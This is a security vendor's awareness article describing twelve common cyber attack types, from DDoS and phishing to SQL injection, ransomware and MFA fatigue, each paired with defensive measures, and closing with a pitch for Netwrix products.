There are many different types of attacks in cyber security — and network security teams must worry about all of them. While no organization can protect themselves against every type of threat, a company is expected to demonstrate due diligence in protecting against the most common forms of cyber-attacks.
The bulk of cyber-attacks are no longer carried out by a lone hacker in their basement. Today, highly organized and well-financed organizations treat cyber security attacks as a business, and they have the means to launch attacks on organizations of every size and industry. With the cost of cybercrime expected to reach $10.5 trillion by 2025, the ability to protect your users and enterprise systems from both external attacks and insider threats is imperative. In fact, it has become a competitive advantage for some companies.
This article describes the 12 most common cyber threats today and provides cyber-attack examples.
1. Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) Attacks
Both denial-of-service and distributed denial-of-service attacks are malicious attempts to make a server, service or network resource unavailable to its intended users. The difference is while a DoS attack comes from a single source, a DDoS attack is implemented from multiple sources, sometimes globally distributed.
DoS and DDoS attacks do not seek unauthorized access; rather, they focus on preventing genuine traffic from accessing its intended destination by overwhelming the target with garbage traffic that consumes the available bandwidth of that host. The underlying reasons might range from targeting a competitor’s website to extorting the victim business to pay the adversaries to stop the attack. Another purpose of a DoS or DDoS attack can be to take a system offline as a distraction so that a different kind of attack can be launched.
The amount of traffic generated by these attacks can be substantial. In 2018, GitHub withstood a DDoS attack for 20 minutes in which it was pummeled by 1.3 terabits per second (Tbsp) of traffic, which was the largest DDoS attack to date. In 2021, however, Microsoft suffered an attack of 3.4 Tbps.
Defense Methods
Cyber criminals use different types of DoS and DDoS attack methods, which require different defense strategies. Here are the most common ones include the following:
- Botnets: DDoS attacks often rely on botnets — networks of compromised computers, called bots or zombie systems, that are controlled by malicious actors. Often the computers’ owners do not even know their machines have become part of a botnet. Once an attacker attains control of the bots, they can be used collectively to carry out attacks against target systems. The amount of traffic generated by these attacks can be substantial and is often designed to overwhelming the bandwidth or processing capabilities of the target systems.
Botnets can be difficult to trace because the machines being used are often in many different geographic locations. One way to curtail botnet attacks is to configure your firewalls to block traffic from countries or IP ranges that your organization does not serve. Other measures include rate limiting, traffic filtering, 24/7 monitoring and implementing web application firewalls (WAFs).
- TCP SYN flood attack: An attacker exploits the use of the buffer space during a TCP session initialization handshake. The attacker’s device floods the target system’s (small) in-process queue with connection requests, but it does not respond when the target system replies to those requests. This causes the target system to time out while waiting for the response from the attacker’s device, which makes the system crash or become unusable when the connection queue fills up.
One countermeasure to thwart these types of attacks is to place servers behind a firewall configured to stop inbound SYN packets. Another is to increase the size of the connection queue and decrease the timeout duration for open connections.
- Teardrop attack: The attacker splits packets into overlapping fragments. When the target system tries to reassemble them, it can crash or reboot due to the conflicting offsets.
While many vendors supply patches that protect their systems from such attacks, you can further protect against them by disabling SMBv2 and block ports 139 and 445.
- Smurf attack: This type of attack floods a target system with unwanted ICMP echo request packets, using a spoofed source IP address. The attacker sends these packets to a network’s broadcast address, causing all devices on the network to reply simultaneously to the target, overwhelming it and leading to a denial of service.
One way to protect your devices from this attack is to disable IP-directed broadcasts on your routers; this will prevent the ICMP echo broadcast request at the network devices. Another option is to configure the endpoint systems to keep them from responding to ICMP packets from broadcast addresses.
- Ping of death attack: Like a Smurf attack, this attack involves the ICMP protocol, but the ICMPecho request packets that are sent exceed the IP protocol’s maximum packet size. When the target attempts to reassemble these malformed packets, it can crash, freeze, or reboot, leading to a denial of service.
Ping of death attacks can be blocked by using a firewall that will check fragmented IP packets for maximum size.
2. Man-in-the-Middle (MitM) Attacks
In a MitM attack, a hacker secretly intercepts and potentially alters the communication between two parties, while tricking both parties into believing they’re communicating directly with each other. Goals can include stealing information or injecting malicious data.
For example, an attacker might set up a rogue wireless access point (WAP) that spoofs a legitimate WAP by using the same or a similar network name (SSID). Unsuspecting users connect to this rogue WAP thinking it’s a trusted network, and then all their wireless data traffic passes through the rogue access point. This enables the attacker to intercept, inspect and modify the data.
Two of the most common types of MitMs are:
- Session hijacking: An attacker intercepts and takes over a user’s established session to gain unauthorized access to a server or web application. One common method is to use a packet sniffer to intercept communication between the user and the server. By capturing or predicting the session token, attackers can bypass authentication and impersonate the victim in order to access sensitive information or functions on the target system.
The diagram below shows how the attacker could then launch a DoS attack to keep the victim’s system offline. and then connect with the server after hijacking the session.
- IP spoofing: An attacker disguises their true source IP address to appear as a trusted entity. By manipulating packet headers, attackers can deceive systems into thinking a malicious packet is from a legitimate source, enabling them to gain access or launch DoS attacks on networks and services.
Defensive Measures
While there is no single technology or configuration to prevent all MitM attacks, there are some security measures organizations and individuals can take to protect themselves against these types of attacks. Best practices include the following:
- Always use encrypted sites (HTTPS) instead of HTTP.
- Avoid using public Wi-Fi for sensitive tasks. If you must use it, always use a VPN.
- Ensure websites have a valid SSL/TLS certificate.
- Update servers to the latest encryption techniques and protocols.
- Use MFA to block hackers who manage to intercept login credentials.
3. Phishing and Spear Phishing Attacks
Phishing attacks combine social engineering and technical trickery to send emails that appear to be from trusted sources, often to either glean personal information like login credentials or to deploy ransomware. Spear phishing is a targeted form of phishing attack in which hackers gather detailed information about a specific individual or organization in order to customize their messages and make the scam more convincing.
The email might urge the user to open an attachment that purports to be innocent but is actually infected with malware. Or it might try to deceive the recipient into visiting a fake website designed to look like their financial institution in order to capture their login credential, or prompt them to download malicious software onto their computer. Phishing attacks are so prominent that 9 in 10 enterprises fell victim to some type of phishing attack in 2022.
One way that hackers make their phishing emails look legitimate is email spoofing — making the information in the “From” section of the email appear as if the email is coming from someone you know, such as your management or your partner company. For example, in 2016, attackers spoofed the email account of the newly appointed CEO of Mattel Corporation in a spear phishing email to the CFO, who wired more than $3 million to a bank account in China. (Luckily, the company was able to reclaim the money.)
Defensive Measures
Because email remains the primary vector for cyberattacks, a robust email security solution is essential. However, no tool is foolproof, so the following supplementary are wise:
- Provide all users with regular training on phishing attacks and broader cyber hygiene practices.
- Teach users to examine email headers and check that the “Reply-to” and “Return-Path” fields align with the email’s stated domain.
- Use sandboxing to test suspicious email in an isolated environment by opening attachments or clicking on embedded links.
4. Drive-by Attacks
Drive-by cyberattacks exploit vulnerabilities in websites to redirect users to malicious sites and discreetly download malware onto their devices. These steps occur without any further action from the user, or even their knowledge.
In other words, merely visiting a website can get your device infected. As an example, an estimated 11,000 WordPress sites were found to be infected with an elusive strain of malware in 2023.
Defensive Measures
These attacks take advantage of outdated software or unpatched systems, so keep your operating systems and web browsers updated. In addition, users should stick to sites they normally use, and reduce the attack surface of their devices by removing unnecessary applications and browser plugins.
5. Password Attacks
Password attacks aim to gain unauthorized access to sensitive information and systems by compromising user passwords. Here are a few of the main attack types:
- Password guessing attacks: There are many types of password guessing attacks. In a brute force attack, they try using every possible password combination until the correct one is found. Typically, they start with the most commonly used passwords, which can enable them to compromise some accounts in seconds.
A specialized brute-force option is a dictionary attack, which limits candidate passwords to words from the dictionary. Attackers can also create a more targeted list of passwords to try to log on with by gaining knowledge about the user’s life or interests. - Keyloggers: Hackers install software on a user’s computer to record the user’s keystrokes as they type the password. AI-powered software can now discern passwords by listening to keyboard clicks.
- Credential stuffing: This form of password attack is so common that it merits its own section. We’ll tackle it next.
Defensive Measures
Passwords remain the most used mechanism to authenticate users, but the reality is, passwords alone are no longer sufficient to protect online accounts. It’s essential to adopt multifactor authentication, which combines at least two of the following: something you know (like a password), something you possess (such as a cellphone or FIDO key), and something inherent to you (like a fingerprint).
Organizations should also establish policies that lock accounts after several unsuccessful login attempts. For optimal results, follow account lockout best practices.
6. Credential Stuffing Attacks
In this form of password attack, cybercriminals use usernames and passwords leaked in prior data breaches to gain access to accounts. These attacks bank on the fact that many people reuse passwords across multiple sites. For example, a hacker may obtain the login credentials of 50,000 users from a breach at one website. When they use these credentials to try to access popular platforms like PayPal.com or major banks, it is likely that a small fraction of those attempts will be successful.
Databases of compromised credentials are actively traded on the dark web; in fact, more than 24 billion username/password combinations are estimated to be in circulation. For example, in 2022, attackers attempted to log in to Norton Password Manager using 925,000 stolen credentials; they successfully compromised an undisclosed number of customer accounts.
Defensive Measures
The best defense against credential stuffing attacks is to educate users to use a unique password for every online account they use, and to make doing so easy by providing a high-quality password management solution.
In addition, if possible, make each person’s username different from their email address. Organizations should also require MFA to render compromised credentials useless.
7. SQL Injection Attacks
SQL injection attacks consistently rank near the top of OWASP’s top ten web application risks. These attacks exploit vulnerabilities in a website’s code to insert malicious SQL code into input fields or application queries. If a site doesn’t properly validate or sanitize user input, an attacker can trick the database into executing unintended SQL commands, enabling attackers to access sensitive information, bypass login credentials or even manipulate website content.
Defensive Measures
To defend against SQL injection attacks, ensure that all your SQL servers are updated and patched regularly, and employ the least-privilege model for database permissions. Prioritize the use of stored procedures and prepared statements (parameterized queries). You should also have a way to validate input data using a whitelist at the application level.
8. Cross-Site Scripting (XSS) Attacks
Cross site scripting attacks use third-party web resources to run scripts in the victim’s web browser or scriptable application. This can be instigated by injecting a payload with malicious JavaScript into a website’s database. When the victim requests a page from the website, the website transmits the page, with the attacker’s payload as part of the HTML body to the victim’s browser that executes the malicious script. For example, it might send the victim’s cookie to the attacker’s server, allowing the attacker to extract it and use it for session hijacking. Scripting XSS can be used to exploit additional vulnerabilities that enable an attacker to log keystrokes, capture screenshots, discover and collect network information, and remotely access and control the victim’s machine.
In 2022 alone, OWASP found more than 274,000 occurrences of some form of SQL injection and cross-site scripting being used. The typical cross-site scripting attack process is outlined below.
Defensive Measures
Defending against cross-site scripting (XSS) attacks requires a combination of robust coding practices and security tools. Important best practices include the following:
- Always validate and sanitize user input to ensure it doesn’t contain malicious scripts.
- Use secure methods to output encoded data in order to render scripts harmless.
- Ensure all web and server software is regularly patched and updated.
- Use automated tools to scan for vulnerabilities and conduct periodic penetration testing to identify potential risks.
9. Malware Attacks
Malware is any form of malicious computer software device. Malware can be introduced to a system through various means, including email attachments, software downloads, USB sticks, malicious websites and legitimate websites that have been infected. Once a single system is infected, malware can propagate through the network to infect more network connected servers and devices. Malware can slow computer performance by consuming system resources.
Some of the most common types of malware today include the following:
- Virus: A virus is a piece of code that attaches itself to legitimate software and propagates to other programs and files on the same system once executed. Once activated, it can corrupt data, degrade system performance, and perform other malicious activities.
- Polymorphic virus: This type of virus changes its code or appearance each time it infects a new host, making detection by signature-based antivirus solutions more challenging. Its core functionality remains intact through the changes.
- Worm: This standalone malware replicates itself without human intervention and spreads to other computers, often by exploiting vulnerabilities in software.
- Trojan: Trojans are malicious programs disguised as legitimate software. Once activated, they can give an attacker control over the victim’s computer and funnel in other instances of malware. It is estimated that trojans represent 58% of all computer malware.
- Rootkit: This stealthy software is designed to gain access to a computer system while hiding its presence. Once installed, it grants attackers full control, allowing for data theft or system manipulation. Rootkits often evade detection by standard antivirus tools.
- Keylogger: As mentioned earlier, keyloggers are deposited on computer systems to capture keystrokes and obtain user passwords.
- Spyware and adware: These forms of malware are used to monitor user activity and collect personal information and other sensitive data.
- Ransomware: Because this form of malware is increasingly common and damaging, it is covered in its own section below.
Defensive Measures
The primary way to secure computers against malware is to use a modern endpoint security solution. Unlike traditional tools, which rely on signature-based malware identification, today’s advanced endpoint applications use heuristic techniques to detect anomalous activities.
Organizations can also implement firewalls that analyze and filter traffic to discover and block potentially harmful code before it infiltrates the network.
10. Ransomware
Ransomware is perhaps the biggest global cyber threat today. Ransomware cost the world more than $20 billion in 2021 and that figure is expected to grow to $261 billion by 2031.
Ransomware is malicious software that encrypts a victim’s data and systems to render them inaccessible. The attacker then demands a ransom from the victim, typically in cryptocurrency, for the decryption key to restore access. While federal law enforcement discourages paying these ransoms, businesses often do so to get their operations back online as quickly as possible. Ransomware gangs often also attempt to encrypt the organization’s backups so they cannot be used to restore systems and data.
As an additional form of extortion, many ransomware attackers will exfiltrate a company’s data before encrypting it and threaten to release or sell the data unless the ransom is paid. That way, even if an organization can restore their data themselves, they are forced to pay the ransom.
Defensive Measures
Ransomware attacks are challenging to defend against due to their increasing variety and sophistication. Indeed, there is no one way to prevent a ransomware attack. It requires a multi-layer security strategy that incorporates multiple security measures, including the following:
- Back up critical data and systems frequently and store the backups where they are not directly accessible from the main network.
- Create network segmentation. If malware enters a portion of the network, VLAN segmentation may be utilized to contain the malware whilst incident response and recovery operations are underway.
- Enforce the principle of least privilege by limiting user rights, provide administrative access only, when necessary (JiT), and eliminate standing privilege whenever possible.
- Use intrusion detection systems and regularly audit your networks for signs of unusual activity.
For additional advice on defending against ransomware attacks, check out these best practices and these 6 tips.
11. Zero-Day Attacks
A zero-day attack exploits a software vulnerability that’s unknown to its vendor and the broader security community. Since there’s no prior knowledge of the vulnerability, there’s often no specific defense or patch in place when the attack occurs. This gives developers zero days to address the issue before it’s exploited.
Defensive Measures
Since zero-day attacks exploit uncharted vulnerabilities, key best practices like regular patching and configuration management provide little help. Instead, focus on a defense in depth cybersecurity posture that includes effective monitoring of your IT estate, threat intelligence, network segmentation, application whitelisting and anomaly detection .
12. Compromise of One-Time Codes used in MFA
Organizations are rapidly adopting multifactor authentication (MFA) not just for privileged access but for all users. Indeed, the global MFA market is projected to grow from $11.1 billion in 2021 to more than $23 billion by 2026.
One of the most common authentication methods in MFA is one-time codes sent to a user through SMS or an authentication app. Unfortunately, these codes can be compromised in several ways. In particular, attackers can:
- Exploit vulnerabilities in the mobile communication infrastructure or use malware to read SMS messages directly from a user’s device.
- Trick users into providing their one-time codes through deceptive websites or emails that mimic legitimate services.
- Convince a user’s mobile carrier to switch their phone number to a new SIM card so the attacker will receive the one-time codes sent via SMS. This technique is called SIM swapping.
Instead of intercepting one-time codes, some cybercriminals are exploiting MFA fatigue. The fact is, users are so inundated by MFA prompts that they feel overwhelmed. So, when a hacker tries to log on using their compromised credentials, the user might simply approve the resulting MFA request without stopping to realize that it is not legitimate. As a result, the hacker gets authorized.
Defensive Measures
There are multiple ways to strengthen your MFA procedures. One is to limit the number of MFA alerts sent to a given user account within a given timeframe, since that can be a sign of malicious access attempts. In addition, educate users to view unexpected MFA alerts with caution. Finally, consider replacing push notifications with other authorization methods that are less vulnerable to hacking.
Conclusion
So, what is the most common cyber-attack? There is no enduring answer to this question, since attack methods fall in and out of popularity. Accordingly, the best strategy for every organization is to adopt a defense-in-depth approach that covers all the functions of the NIST Cybersecurity Framework.
The good news is that the Netwrix suite of solutions does all of this. It empowers you to:
- Easily discover and accurately classify your data, both on premises and in the cloud
- Proactively identify and remediate security gaps before attackers exploit them
- Replace risky standing privileged accounts with ephemeral accounts that have just enough access to perform the task at hand
- Enforcement of least privilege access for all systems and data repositories
- Continuously audit and analyze activity for anomalous behaviors
- Get real-time alerts and even set up automated responses for known threats
- Quickly investigate security incidents and determine the most effective response
- Recover more quickly from cyberattacks and other incidents
Plus, Netwrix solutions integrate smoothly with many other security tools to streamline processes and enhance cybersecurity.
